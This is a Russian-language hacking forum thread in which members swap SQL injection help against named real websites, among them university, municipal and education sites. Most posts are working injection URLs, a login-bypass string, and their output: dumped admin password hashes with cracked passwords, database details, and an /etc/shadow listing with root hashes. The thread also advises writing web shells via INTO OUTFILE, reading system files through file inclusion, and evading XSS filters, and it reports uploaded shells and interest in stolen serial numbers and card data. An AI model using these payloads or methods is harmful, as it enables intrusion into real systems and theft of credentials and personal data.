2 sabe
По поводу MSSQL вот статья:
_https://forum.antichat.ru/thread30501.html
Вопрос такой, что в двух словах не объяснишь

спс.. будем учится..)

Через какой путь можно замутить взлом)?? chat.bobrik.ru/?59

http://cyberagesystems.com/member.php
на том сайте
Login: Admin
PAss : '1or'1=1

можно как админом залогинится, только что толку?

1SeTh, никакого))
Попробуй заходить под другими мемберами. там есть какая-то база серийных номеров к программным продуктам. вот их можно спереть.

да ты прав, можно нахляву получить серийники, только мемберов то я незнаю )

еще не понятно тогда как админ редактирует контент?

1SeTh, прописать в логин и пароль что-то типа
-99' or email like '%sergey%' /* -99 для того чтобы этой записи в бд точно не было, тогда сработает конструкция or
pass'/*
за место sergey подбираем слово, которое может входить в мыло.

1SeTh, прописать в логин и пароль что-то типа
-99' or email like '%sergey%' /* -99 для того чтобы этой записи в бд точно не было, тогда сработает конструкция or
pass'/*
за место sergey подбираем слово, которое может входить в мыло.

я пробовал как ты сказал, как бы ни крутил только под логином админа заходишь.

вместо слово сергей поставил пару американских имен все равно заходить под логином Admin :confused:

1SeTh, я зашел под другим логином :)
вбиваем
pizda' or password like '%9%'/*
pizda' or password like '%9%'/*
входим под grease2
=))))

Ребят, прошу помощи.Через order by подобрал поля. Пытаюсь вывести через
index.php?ID=-19+UNION+SELECT+1,2,3/* -т.е. при неверном id, редиректит на др. страницу another.html
При запросе ID=19+UNION+SELECT+1,2,3/* не выводит ошибок, но и выводимых полей нет, id то верный.
Как можно обойти?
И вообще не первый раз встречаюсь с ситуацией,id=1593+order+by+12/* ошибка,id=1593+order+by+8/* нет ошибки,id=-1593+order+by+8/* редирект.Why?

пробуй
ID=-1+UNION+SELECT+1,2,3/*
или
ID=19+and+1=0+UNION+SELECT+1,2,3/*

2 AFoST
К сожалению не прокатило. Но все равно спасибо за совет.

Imperou$
давай ссылку, и будет гораздо проще

jokester, именно :)
Imperou$, давай ссылку-будем вдуплять :)

1SeTh, я зашел под другим логином
вбиваем
pizda' or password like '%9%'/*
pizda' or password like '%9%'/*
входим под grease2
=))))
спасибо, пробовал весь английский алфавит в запросе, не нашел юзера у аого чтобы был сериал намбер

1SeTh, я тоже ищу-пока безрезультатно. видать программулину мало кто покупает :)

http://cropandsoil.oregonstate.edu/people/faculty.php?ID=19+order+by+3/*
вот ссыль, это одна из целой кучи, где я с такой хней встречался.

http://img225.imageshack.us/img225/9384/raosujayalj2.jpg
Всё из-за этого.

http://img399.imageshack.us/img399/8240/raosujayavj3.jpg
Всё из-за этого.

Я не сомневался :)
а если серьёзно? Я просто не понял стёба.

Imperou$
Обычная слепая скуль(я во всяком случае вывода не добился), подзапросы, или другой параметр, я не смотрел

http://kmoddl.library.cornell.edu/resources.php?id=1593+order+by+1/*
А вот такой вариант? Ребят, вы если что нащли или показали, то обьясняйте пожалуйста. А то я не всегда догоняю о чем речь :) Или хотя бы ткните на статьи где это подробно рассматривается. Например с подзапросами у меня вообще лажа полная, не понимаю как они функционируют. Новичёк ещё просто, не разобрался со всем.

Твой параметр тоже слепая , но вот другой с выводом:
_http://kmoddl.library.cornell.edu/resources.php?t=9999999+union+select+1,UNHEX(HEX(v ersion())),3/*
Сдесь про подзапросы:
http://forum.antichat.ru/showthread.php?t=18552

Огромное спасибо! Начал вьезжать, что к чему.

http://kmoddl.library.cornell.edu/resources.php?t=9999999+union+select+1,CHAR(60,105 ,109,103,32,115,114,99,61,104,116,116,112,58,47,47 ,105,109,103,53,49,55,46,105,109,97,103,101,115,10 4,97,99,107,46,117,115,47,105,109,103,53,49,55,47, 53,57,50,50,47,114,97,111,115,117,106,97,121,97,10 6,115,54,46,106,112,103,62,60,47,105,109,103,62),3/*

как вы это делаите? :(
Ты про что именно ? ;)

И снова здраствуйте :)

Почему возникает ошибка при попытке вывода колонок методом union+select вида:

The used SELECT statements have a different number of columns

если через order+by поля подобрал верно?

Возможно эти значения используются в нескольких запросах. В одном из запросов колонок больше/меньше чем ты указал, а второй запрос выполнился правильно, но вывода результатов на страницу нет.

Возможно эти значения используются в нескольких запросах. В одном из запросов колонок больше/меньше чем ты указал, а второй запрос выполнился правильно, но вывода результатов на страницу нет.

Как всегда тебе спасибо за чёткость и оперативность :) Курю мануалы, накачал статей, но не нашёл по сабжу :(
Обойти возможно?

Обойти возможно?
посимвольный брут

Imperou$ Вот тебе пояснения:
_http://forum.antichat.ru/threadnav43966-3-10.html

del.+
__________
Add:
А подзапросы то, оказывается, великая сила :) Только нудногеморная :(
Но доступ к серву получил,шелл залит :) Всем помогавшим биг рэспект!

Такой вопрос по sql-inj:

index.php?id=9999'+or+1=1/*
срабатывает как полагается (выносятся все записи)

index.php?id=9999'+or+1=2/*
срабатывает тоже как надо (пустой результат)

Но почему то, стоит добавить семиликон, всё похоже завершается ошибкой (пустой результат)
index.php?id=9999'+or+1=1;/*

В чём может быть дело. Вроде бы все субд понимают ; или нет ? Так же пробывал в URL кодировке - тоже самое

Вроде бы все субд понимают ; или нет ?
Mysql нет , mssql да

Mysql нет , mssql да

Не, в смысле как разделитель он может её не воспринимть, но как конец строки - это ведь ок и в MS и в My, разве нет ? В данном случае, ведь просто в конце строки ';' стоит.

Полистай:
_https://forum.antichat.ru/threadnav43966-4-10.html
Там обсуждали
З.ы Слушай, а я ведь гоню, в конце строки должно работать, что-то я туплю :D
Убери "/*"

Убери "/*"

Если это убрать то на сервере добавиться ' и всё превратиться в обычный строковый параметр, так что надо собственно ; убирать


Ну это особо неважно, просто наблюдение. Вот где я застопорился серьёзно:
www.city.kherson.ua/index.php?id=2351

берём кол-во параметров в select'e:
www.city.kherson.ua/index.php?id=2351'group+by+15+/*
аж 15.. извращённый запрос :)

www.city.kherson.ua/index.php?id=2351'+UNION+SELECT+NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL+/*

пусто. :( Не подскажите ? Может сильно старая версия скуля ?

сабж такой..есть доступ в админку и вордпресс...вопрос знатокам....как залить шелл?
через админку нереально...все файлы переделывает в 3аd4r6f3gf5 и тому подобное...

2 unit171
Там третий мускул.UNION'а нет
_http://www.city.kherson.ua/index.php?id=2351'+and+substring(version(),1,1)=3/*
А по поводу ; и -- я тебе тоже свои наблюдения высказавал.Возьми любую скуль и попробуй

Ситуация, получил я рута пасс через скулю,расшифровал хэш, в пхп майадмин залез (еле нашёл через гугол, руками на сайте хрен найдёшь ;) )
Версия phpMyAdmin 2.11.2 setup.
КАк залить шелл через неё? Директории на сервере я не знаю, точнее пути. И каким видом их вписывать? В общем растолкуйте плз. Заранее спасибо.
З.Ы. Извините за тупость, я ещё только учусь :)

Imperou$, выполни запрос к БД union select '<?tvoy_minishell?>' into outfile 'polniy_put'_do_faila'

Всем спасибо, разобрался :) Шелл залит, vrotmnenogi.php :)
Дико благодарен ачату, спасибо за советы и поддержку!

1.Хы,нашёл тут тоже пару xss-ок уже на другом банковском сайте Ж)).Вот думаю,париться или нет - там не дебилы всё же сидят и поймут гг,если просто применить тупо urlencoding.Можно ещё применить какой-либо метод кодирования ? Ибо со скулей ничего не вышло - 4-ая версия(ошибка в mysql_array,выводит только её,и хрен поймёшь,подобрал я имя таблицы правильно или нет).Сайт вообще какая-то дизайнерская студия разрабатывала =_=.Короче воть)

2. На мой вопрос,что делать с зашифрованными номерами кредиток так и не ответили( Напоминаю,что они 16-и значные =_______=),и расшифровать их мне не удастсо,даже если одни циффры там :Р).

3.А также,финальный мой вопрос из разряда *нупских* - Распишу поподробней:

1.Имеется file_priv на одном сайтеге,все пассы зашифрованы там Ж).Есть открытый порт 3306(ну мускул,превед тебе дарагой:)).Phpmyadmin там нету.

Собственно, очень нужно знать - как залогиниться в бд, расшифровав хеши с mysql ? Какие средства нужно для этого использывать, ибо шелл не залить не зная полного пути и не имея конфигов(,да и кроме етк папи ниче не нащупал:(.).

ЗЫ: Жду жду ждуууу атветов с нетерпением(только не глупых:)))))))))) ).

Ситуация, получил я рута пасс через скулю,расшифровал хэш, в пхп майадмин залез.

Везёт же людям гг)

Велемир,

1. Что ты хочешь сделать с этими хсс? Впарить какому-нить клиенту? Ну впарь, только тебе это в любом случае мало что даст. Про скулю вообще молчу...

(з.ы. банки не хранят данные о своих клиентах в бд на серве, на котором стоит сайт)

2. Забыть или расшифровывать. (в номере кредитки только цифры)

3. Если file_priv = 1, попробуй залить шелл одним из множества способов. Также если у тебя есть доступ к mysql.user, то можно попробовать расшифровать хэш и залогиница в базу, но стоит это делать при условии что доступ разрешен не только localhost, а это бывает достаточно редко :(

Возможли ли как-то реализовать хсску, если фильтр намертво отрезает все, что в <> и их самих тоже. варианты типа <<><><<<>as<a>><<sa>> пробовал, тупо ищет отрывающуюся закрывающуюся кавычки и стирает.
" преобразует в &quot; разрешены теги <b> <i> <li>, это не форум.

Если там не тоит

<meta http-equiv="Content-Type" content="text/html; charset=кодировка>

можно попробовть сделать это через юникод

например как тут

http://forum.antichat.ru/showpost.php?p=658326&postcount=16

Помогите плииз.
http://www.wrx-vladivostok.ru/news.php?id=100+and+1=0+UNION+SELECT+1,2,3/*
matriza@localhost
matriza_wrxvlad
5.0.27-standard-log
Получил структуру базы данных через INFORMATION_SCHEMA.TABLES, но не могу вывести информацию из самой базы.
*http://www.wrx-vladivostok.ru/news.php?id=1+UNION+SELECT+TABLE_NAME,2,3+FROM+INF ORMATION_SCHEMA.TABLES+LIMIT+16,1/*
16: userlist
16.1: name
16.2: pass

Помогите плииз.

http://www.wrx-vladivostok.ru/news.php?id=1+UNION+SELECT+concat_ws(CHAR(45),%60n ame%60,pass),2,3+FROM+matriza.userlist+LIMIT+2,1/*

user-827ccb0eea8a706c4c34a16891f84e7b
827ccb0eea8a706c4c34a16891f84e7b = 12345

customer1-dc5c7986daef50c1e02ab09b442ee34f
dc5c7986daef50c1e02ab09b442ee34f = 001

большое спасибо, принцип понял

http://stiri.rol.ro/content/view/129717/-3'+group+by+1/*/

а дальше хз че делать..у кого какие предложения?

уверен что это скуль..?)

Велемир,


3. Если file_priv = 1, попробуй залить шелл одним из множества способов. Также если у тебя есть доступ к mysql.user, то можно попробовать расшифровать хэш и залогиница в базу, но стоит это делать при условии что доступ разрешен не только localhost, а это бывает достаточно редко :(

Я ж грю,что шелл не могу залить,ибо путь не знаю =_=.Хеши у мя есть,расшифровал не все,а как зайти в бд ниипу,ибо нету привычной мне phpmyadmin =________________________=.Порт открытый,как я уже сказал,есть - (3306).КАК и ЧЕМ залогиница я не знаю =_=,ибо никогда такого не делал.

Так, ещё у меня проблемка с подзапросами(такой вот Веля нуп).По статье Scipio решил попробывать,и чота (а чо?!) не канает.Вот пример:

http://www.site.com/script.php?id=38+and+(select+1+from+users)=1/*

ЗЫ:В таблице 38 полей и я знаю,что таблица users существует, ибо сам из неё выбирал данные)).По идее,должно вернуть ту самую страницу с ид 38,но только без ошибки мускула =_=.Не бейте стульями и табуретками,просто очень нужно :(:(:(

2 Велемир
А если так?
http://www.site.com/script.php?id=38+and+substring((select+1+from+user s),1,1)=1/*
---
2 all.
У меня тоже вопросик.
http://www.site.com/aindex.cfm?part=2042513+and+1=1-- - выполняется
http://www.site.com/aindex.cfm?part=2042513+and+1=0-- - перебрасывает на страницу с ошибкой
http://www.site.com/aindex.cfm?part=2042513-1-- - выводит http://www.site.com/aindex.cfm?part=2042512
Как я понимаю тут MSSQL, но вот как его крутить в такой ситуации?

[QUOTE=Dima-k17]2 Велемир
А если так?
http://www.site.com/script.php?id=38+and+substring((select+1+from+user s),1,1)=1/*
---
QUOTE]

Не выходит чот))

http://www.a2k.org.ua/news.php?id=1978+and+substring((select+1+from+user s),1,1)=1/*

=))

Велемир, а я думаю, что табы users на хосте нету, ибо запрос:

http://www.a2k.org.ua/news.php?id=-1978+UNION+SELECT+1,2,3,4,VERSION(),6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38+--
Даёт вывод, а запрос:

http://www.a2k.org.ua/news.php?id=-1978+UNION+SELECT+1,2,3,4,VERSION(),6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38+FROM+users--
завершается ошибкой...

Ничё подобного,твой метод работает))),вот только вывода нету там =_=,потому и нужны подзапросы...

Велемир
какие подзапросы?
_http://www.a2k.org.ua/news.php?id=-1978+UNION+SELECT+1,2,3,4,VERSION(),password,user, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28%20,29,30,31,32,33,34,35,36,37,38+from+u sers--
4.1.22-standard
d23d8b79f575bcc0eedfb8c4e2f13540
admin
Кстати незамысловатый пасс
admin:repz

это Оракл?
http://blog.chosun.com/blog.screen?blogId=58155&menuId=252978'
как реализовать?)

там нет скули, ошибка в java

2 sabe
уверен что это скуль..?):D

это Оракл?

как реализовать?)

никак :)

спс..) а то я думаю... банк все же))))))

Велемир
какие подзапросы?
_http://www.a2k.org.ua/news.php?id=-1978+UNION+SELECT+1,2,3,4,VERSION(),password,user, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28%20,29,30,31,32,33,34,35,36,37,38+from+u sers--
4.1.22-standard
d23d8b79f575bcc0eedfb8c4e2f13540
admin
Кстати незамысловатый пасс
admin:repz
Да сломать то я его уже давно сломал,меня интересует не это.Есть банковский сайт на 4-ой версии,а до сих пор не научилсо работатьс подзапросами нормально =)),ибо там нужно знать,правильно ли ты подобрал таблицу или нет(вывода нету там).Не вслепую же всё подбирать ? Там ничего не выводится и мне нужно знать, как точно определить существование таблицы с юзерами к примеру,чтобы потом спокойно быть уверенным в том,что я правильно подбираю поля к ней.Этот сайт я привёл просто в качестве примера.

ЗЫ: А пароль меня жосско порадовал,когда hashcracking.info помучил гг)

Дык а трабла то в чем?
http://www.a2k.org.ua/news.php?id=-1978+or+ascii(substring((SELECT%201),1,1))=49/*

Доброго времени суток.
Третий час уже пытаюсь узнать в чем дело:
SQL иньекция на лицо.
Составляю запрос
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/1,concat(admin,0x3a,password,0x3a,usertype),concat (admin,0x3a,password,0x3a,SuperAdministrator)/**/from/**/jos_users/*
Но в ответ пишет:
Error number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/* AND typ = 'hyperlink'' at line 3
Script stopped.
Может кто знает в чем дело?

sakh_rider, дело в том что ты не знаешь что такое sql-inj и как оно работает.

По теме - фильтруеца "/*"

sakh_rider, дело в том что ты не знаешь что такое sql-inj и как оно работает.

По теме - фильтруеца "/*"

Да знаю йа что такое sql injection, да и как работают тоже :rolleyes: ... Уже были сайты, в которых получалось...
Вот просто множество запросов перепробовал, а вылазит одно и тоже именно на етом сайте :confused:

"+" тож пробовал(

Блин, столько времени и все зря...
SELECT command denied to user 'ege'@'pro.iot.ru' for table 'users'
:( :( :(

ку !
есть трабла имеется сайт на который удалось залить шелл в определенную диру но в ней отключены команды систем() ексек() итд но разришена include !
Вопрос возможно ли сделать так чтобы при инклуде шелла обойти эту диру и заинклудить его на директорию выше?
example:
/сс/сммммс/123/_залит_файл_с функц_инклуд/ возможно ли заинклудить в папку /123/??

Нужна помощь.

Microsoft OLE DB Provider for SQL Server ПРЗљ '80040e14'

'or' ХАПіЕх БйУГРЧ БИЙЎРЬ РпИјЕЧОњНРДЯДй.

/community/best_screenshot.asp, Сй 5

Страница в кодировке ISO-8859-5.
Как сделать так,чтобы отображалось нормально?).Кодировки менять пробывал =_=


И ещё - на одном сайте проинклудил файлы - my.cnf (mysql) и httpd.conf.Вот содержание файлов :

1.my.cnf -

# Example mysql config file for large systems. # # This is for large system with memory = 512M where the system runs mainly # MySQL. # # You can copy this file to # /etc/my.cnf to set global options, # mysql-data-dir/my.cnf to set server-specific options (in this # installation this directory is /usr/local/mysql/data) or # ~/.my.cnf to set user-specific options. # # One can in this file use all long options that the program supports. # If you want to know which options a program support, run the program # with --help option. # The following options will be passed to all MySQL clients [client] #password = your_password port = 3306 socket = /var/lib/mysql/mysql.sock ###default-character-set=utf8 # Here follows entries for some specific programs [server] ###init-connect="SET NAMES cp1251" ###skip-character-set-client-handshake ###default-character-set=utf8 # The MySQL server [mysqld] ###default-character-set=utf8 ###character-set-server=utf8 ###collation-server=utf8_general_ci ###init-connect="SET NAMES cp1251" ###skip-character-set-client-handshake datadir=/home/mysql4.data port = 3306 socket = /var/lib/mysql/mysql.sock #log = /usr/local/mysql/data/mysqld.log ###default-character-set = cp1251 skip-locking log_slow_queries = /home/mysql4.data/slow_sql.log long_query_time = 10 join_buffer_size=1M interactive_timeout=60 max_connections=300 max_user_connections=15 key_buffer=512M max_allowed_packet = 2M table_cache = 1024 sort_buffer_size = 2M record_buffer=2M thread_cache=8 connect_timeout=10 max_tmp_tables=64 myisam_sort_buffer_size=256M read_buffer_size = 1M query_cache_size= 16M # Try number of CPU's*2 for thread_concurrency thread_concurrency = 4 # Don't listen on a TCP/IP port at all. This can be a security enhancement, # if all processes that need to connect to mysqld run on the same host. # All interaction with mysqld must be made via Unix sockets or named pipes. # Note that using this option without enabling named pipes on Windows # (via the "enable-named-pipe" option) will render mysqld useless! # # Replication Master Server (default) # binary logging is required for replication #log-bin # required unique id between 1 and 2^32 - 1 # defaults to 1 if master-host is not set # but will not function as a master if omitted server-id = 1 # Replication Slave (comment out master section to use this) # # To configure this host as a replication slave, you can choose between # two methods : # # 1) Use the CHANGE MASTER TO command (fully described in our manual) - # the syntax is: # # CHANGE MASTER TO MASTER_HOST=, MASTER_PORT=, # MASTER_USER=, MASTER_PASSWORD= ; # # where you replace , , by quoted strings and # by the master's port number (3306 by default). # # Example: # # CHANGE MASTER TO MASTER_HOST='125.564.12.1', MASTER_PORT=3306, # MASTER_USER='joe', MASTER_PASSWORD='secret'; # # OR # # 2) Set the variables below. However, in case you choose this method, then # start replication for the first time (even unsuccessfully, for example # if you mistyped the password in master-password and the slave fails to # connect), the slave will create a master.info file, and any later # change in this file to the variables' values below will be ignored and # overridden by the content of the master.info file, unless you shutdown # the slave server, delete master.info and restart the slaver server. # For that reason, you may want to leave the lines below untouched # (commented) and instead use CHANGE MASTER TO (see above) # # required unique id between 2 and 2^32 - 1 # (and different from the master) # defaults to 2 if master-host is set # but will not function as a slave if omitted #server-id = 2 # # The replication master for this slave - required #master-host = # # The username the slave will use for authentication when connecting # to the master - required #master-user = # # The password the slave will authenticate with when connecting to # the master - required #master-password = # # The port the master is listening on. # optional - defaults to 3306 #master-port = # # binary logging - not required for slaves, but recommended #log-bin # Point the following paths to different dedicated disks #tmpdir = /tmp/ #log-update = /path-to-dedicated-directory/hostname # Uncomment the following if you are using BDB tables #bdb_cache_size = 64M #bdb_max_lock = 100000 # Uncomment the following if you are using InnoDB tables #innodb_data_home_dir = /usr/local/mysql/data/ #innodb_data_file_path = ibdata1:10M:autoextend #innodb_log_group_home_dir = /usr/local/mysql/data/ #innodb_log_arch_dir = /usr/local/mysql/data/ # You can set .._buffer_pool_size up to 50 - 80 % # of RAM but beware of setting memory usage too high #innodb_buffer_pool_size = 256M #innodb_additional_mem_pool_size = 20M # Set .._log_file_size to 25 % of buffer pool size #innodb_log_file_size = 64M #innodb_log_buffer_size = 8M #innodb_flush_log_at_trx_commit = 1 #innodb_lock_wait_timeout = 50 [mysqldump] quick max_allowed_packet = 16M [mysql] no-auto-rehash # Remove the next comment character if you are not familiar with SQL #safe-updates [isamchk] key_buffer = 128M sort_buffer_size = 128M read_buffer = 2M write_buffer = 2M [myisamchk] key_buffer = 128M sort_buffer_size = 128M read_buffer = 2M write_buffer = 2M [mysqlhotcopy] interactive-timeout

Так же есть etc/passwd и httpd.cond.Сколько ни пыталсо,вручную все не перебрал(руки отвалились:ДД,ибо инклудера нету работающего).Что можно выудить из всей этой информации ? Логина и пароля тут нету =_=.phpinfo кстати тож имеецо,но от него толку мало).Что должно быть в httpd.conf ? В системе такой фаил один?.

ЗЫ: прошу прощения за флуд,но в один пост всё не накатаешь...

Дык а трабла то в чем?
http://www.a2k.org.ua/news.php?id=-1978+or+ascii(substring((SELECT%201),1,1))=49/*

Уже ни в чём,лови плюсики )))

Велемир, из etc/passwd можешь вытащить логины и брутить их :) Из конфигов апача можно получить полный путь и попытаца найти конфиг и проинклюдить его.

Велемир, из etc/passwd можешь вытащить логины и брутить их :) Из конфигов апача можно получить полный путь и попытаца найти конфиг и проинклюдить его.

А вот я не знаю где он там... =__________=

Велемир, не знаешь где конфиг или где этот путь в конфиге?

Где путьв конфиге конкретно.Там идёт сплошной текст хрен разобрать =_=

нужно название табличек и столбцов в FastBB кто поможет

http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,3,load_file(configuration.php), 5,6+from+jos_users.users--

Denied блин :(
Может кто уже был на етом сайте и знает как в БД попасть или хотя бы в админку?

Свой вопрос снимаю=) сам же расписывал тут функцию substring и сам же не додумался ее использовать=)

посотрите ентот сайтик пжалуйста, то чет я не чего стоищего найтии немогу! http://rikz.unibel.by/

Есть срочный вопрос:
Составляю запрос:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+order+by+10--
Вылазит такое:
Unknown column '10' in 'order clause'
Ето то понятно, но что странное:
Составляю запрос:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+order+by+3--
Страница вообще изчезает, да и в коде ничего нет.
Иду дальше:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-+union+select 1,2,3-- и тут мистика: страница вообще не грузится.
Ладно, я подумал, что так и должно быть, попробовал такое:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,version()-- она опять не захотела грузица да и '+' изчезают и заменяются на пробелы(...
Что странное - то, что при других циферках вылазиют ошибки типа нет такой таблицы или числа. А именно при "3" страница не грузица вообще...
Если кто знает подскажите плиз...

2 sakh_rider
Только смотри внимательно,вывод есть,но не как обычно :)

_http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=1+union+select+1,2,@@version+--+

5.0.51a
ege@pro.iot.ru

2 sakh_rider
Только смотри внимательно,вывод есть,но не как обычно :)

_http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=1+union+select+1,2,@@version+--+

5.0.51a
ege@pro.iot.ru

Ух ты, я действительно сразу не заметил, все думал что ето за циферки в адрес лезут... Эхх.. сенкс + :)

http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(setting,0x2e ,value)+from+ege_astats_config+limit+1,1--
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(setting,0x2e ,value)+from+ege_astats_config+limit+2,1--
почему не подходит? =\
http://www1.ege.edu.ru/administrator/components/com_astatspro/administration/index.php?

а вообще, там около 150 таблиц, мне влом все перебирать
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(table_schema ,0x2e,table_name)+from+information_schema.tables+l imit+18,1--
вот эта с конфигом

http://la2.emserv.ru/indexx.php?start_from=10&ucat=&archive=&subaction=&id='&lang=ru можно че сделать? а то я уже совсем запутался ;(

http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(setting,0x2e ,value)+from+ege_astats_config+limit+1,1--
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(setting,0x2e ,value)+from+ege_astats_config+limit+2,1--
почему не подходит? =\
http://www1.ege.edu.ru/administrator/components/com_astatspro/administration/index.php?

а вообще, там около 150 таблиц, мне влом все перебирать
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+and+typ+=+1+union+select+1,2,concat(table_schema ,0x2e,table_name)+from+information_schema.tables+l imit+18,1--
вот эта с конфигом

Буду перебирать далее :) сенкс +)

Еще вопросик: как можно ето "etc/passwd" превратить в нечто подобное
0 x какие-то_символы . Как я понимаю это hex.
Кто-нить знает как можно закодировать?
А то обычный
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,load_file(ect/passwd)+from+ege_users+limit+2,1-- не показывает(

1. http://hack-shop.org.ru/tools-code-encode
>SQL Hex + 0x | Path :

2. правильно load_file('/etc/passwd')

sakh_rider
load_file('/etc/passwd') == load_file(0x272f6574632f70617373776427)

вообще то в хексе без ковычек)

чо делать вот с этим http://www.uniway.be/reference.aspx?id=221'

тут ничего нет, оно просто ругается на некорректный формат полученных данных

чот не могу подобрать кол-во столбцов уже дошел до 30
а при order by все время ошибка
Ошибка запроса:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1/*' at line 1
объясните что делаю не так???
http://www.kn.kz/articles.php?id=-274+union+select+order+by+1/*

ну подскажите(
c order by разобрался он мне говорит что там 3 столбца но при union select 1,2,3/*
выдает ошибку
Ошибка запроса:The used SELECT statements have a different number of columns
http://www.kn.kz/articles.php?id=-1+union+select+1,2,3/*

Там к двум таблицам запрос, с разным числом колонок.

и что мне делать можно эту скулю расскрутить и как?

В этой может подзапросы прокатят. Попробуй другие бажные скрипты поискать. На крайний случай, в сканер загани.

Вот посмотри, может выйдет что.

http://www.kn.kz/not_live_build.php?action=search&cityId=-2+union+select+0/*

у мя тут еще вопросик
нашел инклуд удалось прочитать etc/shadow
root:$1$8rIgCgQb$aAplIifRAaGkohCa4G1/8/:13773:0:99999:7:::
bin:*:13742:0:99999:7:::
daemon:*:13742:0:99999:7:::
adm:*:13742:0:99999:7:::
lp:*:13742:0:99999:7:::
sync:*:13742:0:99999:7:::
shutdown:*:13742:0:99999:7:::
halt:*:13742:0:99999:7:::
mail:*:13742:0:99999:7:::
news:*:13742:0:99999:7:::
uucp:*:13742:0:99999:7:::
operator:*:13742:0:99999:7:::
games:*:13742:0:99999:7:::
gopher:*:13742:0:99999:7:::
ftp:*:13742:0:99999:7:::
nobody:*:13742:0:99999:7:::
dbus:!!:13742:0:99999:7:::
vcsa:!!:13742:0:99999:7:::
rpm:!!:13742:0:99999:7:::
haldaemon:!!:13742:0:99999:7:::
netdump:!!:13742:0:99999:7:::
nscd:!!:13742:0:99999:7:::
sshd:!!:13742:0:99999:7:::
rpc:!!:13742:0:99999:7:::
rpcuser:!!:13742:0:99999:7:::
nfsnobody:!!:13742:0:99999:7:::
mailnull:!!:13742:0:99999:7:::
smmsp:!!:13742:0:99999:7:::
pcap:!!:13742:0:99999:7:::
apache:!!:13742:0:99999:7:::
webalizer:!!:13742:0:99999:7:::
xfs:!!:13742:0:99999:7:::
ntp:!!:13742:0:99999:7:::
pegasus:!!:13742:0:99999:7:::
named:!!:13742:0:99999:7:::
ftpuser:$1$PF7fe8Eh$rITd0IUQ1KF809DLIfH6H/:13742:0:99999:7:::
xat:!!:13745:0:99999:7:::
mysql:!!:13754::::::
посоветуйте прогу для расшифровки как я понимаю тут md5
потому что стоит префикс $1$?

Зайди на Old.Antichat.Ru , там есть описание хешей или по форуму поищи.

md5(unix) , PP

Vid0k
http://www.kn.kz/not_live_build.php?action=search&cityId=1+union+select+unhex(hex(concat_ws(0x3a,ver sion(),database(),user())))/*
Данные выводятся в Назв. Комплекса\

Database Version: 4.1.20
Database name: knkz
User name: knkz_user@87.242.98.203

появился вопрос...
вот есть инжект...
http://www.beka.ru/php/content.php?id=1614+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19/*
ошибка на том сайте не выводится, а просто перебрасывает на главную страницу сайта.. собственно вопрос.. как определить принтабельные поля?

19 штук.. перебрать влом?)) юзай тулзы..

не понял... всмысле перебрать?
а тулзы юзать пока не получится.. линуху поставил, а линуховские тулзы не видел...
просто такой движок я уже нашел примерно на 20 сайтах... именно тф же переменная уязвима и именно так же перебрасывает..

как я понял тебе нужно найти поле куда вписать значение?
ну вот вписуй например version() в каждое поле с 1 по 19 пока чтото не выдаст...?

ничего это бы и не дало, но я все таки решил попробовать... может еще какие-нибудь мысли будут?

я канешн с такой траблой не сталкивался.. но почему нет? теоритически должно выйти.. токо с конвертированиям заипешся... unhex(hex(version())), больше идей нету..)

толку нету я думаю.. просто время убить... чтобы выводилась та инфа надо чтобы полям на странице ничего не присваивалось.. следовательно надо вызвать ошибочное обращение к базе например id=-1 или id=999999 но тут вместо этих ошибок идет переброс на главную страничку... обидно то что я в гугле с такой же уязвимостью именно в этом же скрипте нашел штук 20-30 сайтов... и все посвященый медицине...

еще кстати наткнулся на вид ошибок...
http://lor-homeopat.ru/php/content.php?id=209'
вот такого плана.. т.е. выводится ls -l в домашней папке, но как это разжевать я хз...

второй раз уже сталкиваюсь с такой ерундой:
http://www.tati.ch/shop.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23.....

так пробую до 100 колонок и все равно выдает ошибку Failed. Error: The used SELECT statements have a different number of columns

В чем проблема, может кто подскажет?
Неужели у меня руки не тем концом вставлены? =)

второй раз уже сталкиваюсь с такой ерундой:
http://www.tati.ch/shop.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23.....

так пробую до 100 колонок и все равно выдает ошибку Failed. Error: The used SELECT statements have a different number of columns

В чем проблема, может кто подскажет?
Неужели у меня руки не тем концом вставлены? =)
ну как бы да))))

http://www.tati.ch/shop.php?cat=-1+union+select+1,2,version(),4/*

собственно повторюсь

появился вопрос...
вот есть инжект...
http://www.beka.ru/php/content.php?id=1614+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19/*
